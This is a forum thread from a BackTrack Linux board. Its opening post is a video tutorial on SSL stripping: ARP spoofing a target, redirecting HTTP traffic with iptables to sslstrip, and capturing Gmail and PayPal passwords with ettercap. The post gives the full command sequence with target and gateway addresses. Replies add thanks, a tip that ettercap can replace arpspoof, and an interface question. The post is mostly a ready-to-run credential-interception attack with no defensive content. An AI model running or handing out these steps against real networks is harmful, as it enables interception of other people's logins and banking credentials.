Page 1 of 8 123 ... LastLast
Results 1 to 10 of 79

Thread: [Video] How to: Snifff SSL / HTTPS (sslstrip)

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Stripping SSL & Sniffing HTTPS (SSLStrip)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/2345515
    Download video: http://www.mediafire.com/?nbx8odfabbgf21j

    What is this?

    This video shows that with SSL encryption, it isn't secure. Proof of this is seen by showing a web based email (Google Mail) & online bank (PayPal) password.


    How does this work?
    > Performing a 'Man In The Middle' attack therefore all the traffic flows through the attacker.
    > Picks out HTTP traffic from port 80 and then packet redirection / forwarding onto a different port.
    > SSLStrip is then listening on that port and removes the SSL connection before passing it back to the user.
    > ettercap then picks out the username & password.


    What do I need?

    > sslstrip
    > arpspoof
    > ettercap
    *all in BackTrack 4 Pre Final*


    Network Setup:
    Targets IP: 192.168.1.6
    Gateway : 192.168.1.1


    Software
    Name: sslstrip
    Version: 0.2
    Home Page: http://www.thoughtcrime.org/software...rip/index.html
    Download Link: http://www.thoughtcrime.org/software...rip-0.2.tar.gz

    Name: arpspoof (DSniff)
    Version: 2.3
    Home Page: http://www.monkey.org/~dugsong/dsniff/
    Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

    Name: ettercap
    Version: 0.7.3
    Home Page: http://ettercap.sourceforge.net
    Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download


    Commands:
    Code:
    kate /etc/etter.conf
    >*uncomment redir_command_off in the iptables, linux section*
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    ettercap -T -q -i wlan0
    
    sslstrip -a -k -f
    ettercap -T -q -i wlan0
    Notes:
    You could save the packets instead, and then look through it later, in case ettercap doesn't pick up the information you need!

    Song: 16 Bit Lolitas - Nobody Seems To Care
    Video length: 03:55
    Capture length: 4:41

    Blog Post:http://g0tmi1k.blogspot.com/2009/07/...ssl-https.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1659-%5Bvideo%5D-how-snifff-ssl-https-sslstrip.html
    Last edited by g0tmi1k; 03-05-2011 at 04:15 PM.
    Have you...g0tmi1k?

  2. #2
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Thanks for posting the tutorial to the new forums, it's good to see you here.

    EDIT: Answer to the below: You're welcome, g0tmi1k!
    I deleted the warning since it is fixed now, there's no reason to leave it here.
    Last edited by Snayler; 02-28-2010 at 08:31 AM.

  3. #3
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by Snayler View Post
    Thanks for posting the tutorial to the new forums, it's good to see you here.
    The two following links are pointing to different places than what they announce. In your blog they're also like this.
    Hello!
    Thanks for the warm welcome! (=
    and another thanks for pointing that out!
    *updates and checks all posts*
    Have you...g0tmi1k?

  4. #4
    Junior Member
    Join Date
    Feb 2010
    Posts
    34

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Great Video thanks for sharing i marked this on my favorites..Great song..Whats the group of the song

  5. #5
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by Big_Mike View Post
    Great Video thanks for sharing i marked this on my favorites..Great song..Whats the group of the song
    Your welcome!
    The song info is posted in the video & the post... but here it is again.
    Song: 16 Bit Lolitas - Nobody Seems To Care
    Have you...g0tmi1k?

  6. #6
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    20

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Hi gotm1lk,

    what a great video. Well done. Could you come out with more tutorials? or you could point me to some other resources as well.

    Cheers~~

  7. #7
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by khianhui View Post
    Hi gotm1lk,

    what a great video. Well done. Could you come out with more tutorials? or you could point me to some other resources as well.

    Cheers~~
    Thanks for the thanks!
    There is my blog for the ones which I have done...*also have added most of them here*. I'm trying to do, at least a one video once a month.
    For other resources , keep your eye here...if it was anything like the old forum, there will be alot of good info posted. backtrack-linux just needs time, as its new! (=
    Have you...g0tmi1k?

  8. #8
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Theres also xhydra if you dont like the CLI helps with trial and error type of attacks

  9. #9
    Just burned his ISO sql-inj's Avatar
    Join Date
    Mar 2010
    Posts
    23

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    I cant see the reason for using both ettercap AND arp-spoof. You can do the arp-poisoning using ettercap, no need for arp-soof.

    (If I am mistaken, please do correct me)

  10. #10
    Just burned his ISO ethicalhacker's Avatar
    Join Date
    Feb 2010
    Location
    Universe
    Posts
    9

    Question Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    That was the great posting.

    I have doubt

    I dont find wlan0 in my lan.

    Can i interchange, it will eth0

    will it work???

Page 1 of 8 123 ... LastLast

Similar Threads

  1. Sickness - Password Sniffing with SSLStrip.
    By sickness in forum BackTrack Videos
    Replies: 35
    Last Post: 09-17-2010, 01:16 PM
  2. creating BT4 USB persistent video
    By jimmy in forum Beginners Forum
    Replies: 0
    Last Post: 02-12-2010, 11:45 PM
  3. sslstrip w/ My Wired-Wireless Network
    By MassAppeal in forum Beginners Forum
    Replies: 11
    Last Post: 02-11-2010, 05:56 AM
  4. Video Capture Software
    By sprouty in forum Beginners Forum
    Replies: 4
    Last Post: 01-25-2010, 11:16 AM
  5. sslstrip v0.7
    By Mr-Protocol in forum Tool Requests
    Replies: 2
    Last Post: 01-18-2010, 06:33 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •